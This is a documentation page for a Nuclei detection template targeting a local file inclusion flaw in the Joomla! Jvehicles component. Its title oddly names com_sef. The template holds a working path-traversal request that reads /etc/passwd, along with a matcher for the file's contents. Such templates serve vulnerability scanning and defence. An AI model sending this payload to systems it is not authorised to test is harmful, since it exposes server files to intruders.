Joomla! Component com_sef - Local File Inclusion
ID: joomla-jvehicles-lfi
Severity: high
Author: daffainfo
Tags: joomla,lfi,edb
Description
Section titled “Description”A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
YAML Source
Section titled “YAML Source”id: joomla-jvehicles-lfi
info: name: Joomla! Component com_sef - Local File Inclusion author: daffainfo severity: high description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11997 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 1 tags: joomla,lfi,edb
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0"
- type: status status: - 200# digest: 490a0046304402205da336c8cab7bb1083f77ed558b7cd2f4ff2cf882adff35dc638607f6230d1a802207b0ccc2cea89d0b716ea05002d7025d72733abb4c8bc66fd251bbf5df5e93cc4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml"